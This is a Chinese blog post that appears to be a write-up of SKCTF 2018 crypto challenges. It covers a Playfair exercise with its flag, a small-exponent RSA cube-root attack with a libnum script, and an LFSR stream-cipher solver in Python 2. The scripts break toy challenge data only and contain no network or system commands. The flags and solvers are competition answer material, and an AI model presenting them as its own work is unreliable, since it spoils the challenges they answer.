<h2 id="看到的就是全部了"><a href="#看到的就是全部了" class="headerlink" title="看到的就是全部了"></a>看到的就是全部了</h2><p>常规古典题，Unicode，栅栏，凯撒。</p>
<h2 id="Play-Fair"><a href="#Play-Fair" class="headerlink" title="Play Fair"></a>Play Fair</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">加密游戏规则：</span><br><span class="line"></span><br><span class="line"># j -&gt; i</span><br><span class="line"># 若 p1&#x3D;p2，则插入一个字母(X)于重复字母之间；</span><br><span class="line"># 若明文字母数为奇数时，则在明文的末端添加(Z)作为填充；</span><br><span class="line"></span><br><span class="line">key：just do it</span><br><span class="line">plain：playfairseemseasythanothers</span><br></pre></td></tr></table></figure>
<blockquote>
<p>play fair decode<br>矩阵按行生成<br>j-&gt;i 含义为j替代i 因此在生成的矩阵中有j无i</p>
</blockquote>
<p>play fair是一种使用一个关键词方格来加密字符对的加密法。</p>
<p>根据加密算法来加密就行。<br><a target="_blank" rel="noopener" href="https://baike.baidu.com/item/playfair%E5%AF%86%E7%A0%81/8999814?fr=aladdin">playfair百科</a></p>
<p>SKCTF{rhcwgodmdbordbbutcgbmasklzdx}</p>
<h2 id="ez-rsa"><a href="#ez-rsa" class="headerlink" title="ez_rsa"></a>ez_rsa</h2><p>考察的是低指数幂的rsa攻击。</p>
<blockquote>
<p>在RSA中e也称为加密指数。由于e是可以随意选取的，选取小一点的e可以缩短加密时间，但是选取不当的话，就会造成安全问题。</p>
<p>e=3时的小明文攻击</p>
<p>介绍：<br>当e=3时，如果明文过小，导致明文的三次方仍然小于n，那么通过直接对密文三次开方，即可得到明文。</p>
</blockquote>
<p>由于数据很大，需要用到libnum，介绍一下<a target="_blank" rel="noopener" href="https://www.cnblogs.com/pcat/p/7225782.html">安装</a>：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;hellman&#x2F;libnum</span><br><span class="line">cd libnum</span><br><span class="line">python setup.py install</span><br></pre></td></tr></table></figure>
<p>脚本攻击，由于知道e=3，很简单</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">import libnum</span><br><span class="line"></span><br><span class="line">n &#x3D; 127736277372703302601056543119422673263688414162130452012271136376613506149677023810059879551077756689012265602068781726322860263396788055341495459092641851239465778777954763378423777055786390661741851297248439205933852145044703803764388021585419049988085302710871206091591995497858682344782684500134395300049</span><br><span class="line">c &#x3D; 20007698782339834246219328724588364459038474898597431254441716723329047692482286669616878491497181438826429104573158490197780427343059002311390665150204203593904674308567972583524863664412573864470357485299378319457792659062998310715680020892095430469672971488726545126438904961637</span><br><span class="line"></span><br><span class="line">e&#x3D;3</span><br><span class="line"></span><br><span class="line">m &#x3D; libnum.nroot(c,e)</span><br><span class="line">flag &#x3D; libnum.n2s(m)</span><br><span class="line">print flag</span><br></pre></td></tr></table></figure>

<h2 id="流密码"><a href="#流密码" class="headerlink" title="流密码"></a>流密码</h2><p>hint:</p>
<blockquote>
<p>初始状态为10001，放入lfsr中移位吧<br>lfsr产生序列和Y等长，生成它<br>尝试把二进制转换为字符，flag长度为23<br>LFSR原理：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180514/bd239HCiI7.png?imageslim" alt="mark"></p>
</blockquote>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180514/c8gB5dLfI6.jpg?imageslim" alt="mark"><br>如图，我们可以知道Y = LFSR^FLAG，想知道flag，只要知道LFSR之前的状态即可。<br><strong>LFSR过程</strong>：<br>输出的第i个和第(i+3)个异或得到第（i+5）个数据。<br>得到LFSR过程前的结果后，将其与Y异或就可以得到flag。</p>
<p>脚本：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line">Y =<span class="string">&quot;1101110011010001000000011110111101011001010011111100000101000110011000010011000001100101101110010010001110011001011110111110100010001110111110110110011111010111110001100001101000101010&quot;</span></span><br><span class="line">len = len(Y)</span><br><span class="line"><span class="keyword">print</span> len <span class="comment"># 求得Y的长度184</span></span><br><span class="line"></span><br><span class="line">X = <span class="string">&#x27;10001&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">184</span>):</span><br><span class="line">	X += str(int(X[i]) ^ int(X[i + <span class="number">3</span>]))</span><br><span class="line"><span class="keyword">print</span> <span class="string">&quot;X = &quot;</span>+ X</span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">184</span>):</span><br><span class="line">	flag += str(int(X[i]) ^ int(Y[i]))</span><br><span class="line"><span class="keyword">print</span> <span class="string">&quot;flag = &quot;</span>+flag</span><br><span class="line">list = <span class="string">&#x27;&#x27;</span></span><br><span class="line">j = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> j &lt; len:</span><br><span class="line">	list += chr(int(flag[j:j+<span class="number">8</span>],<span class="number">2</span>))</span><br><span class="line">	j += <span class="number">8</span></span><br><span class="line"><span class="keyword">print</span> list</span><br></pre></td></tr></table></figure>






</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2018/05/12/3rd-SKCTF2018/">http://v0w.top/2018/05/12/3rd-SKCTF2018/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/AlipayQR.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechatQR.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/05/28/Shell-without-alpnum/"><i class="fa fa-chevron-left">  </i><span>没有数字字母的WebShell</span></a></div><div class="next-post pull-right"><a href="/2018/05/07/ISCC2018/"><span>ISCC 2018 WriteUp</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>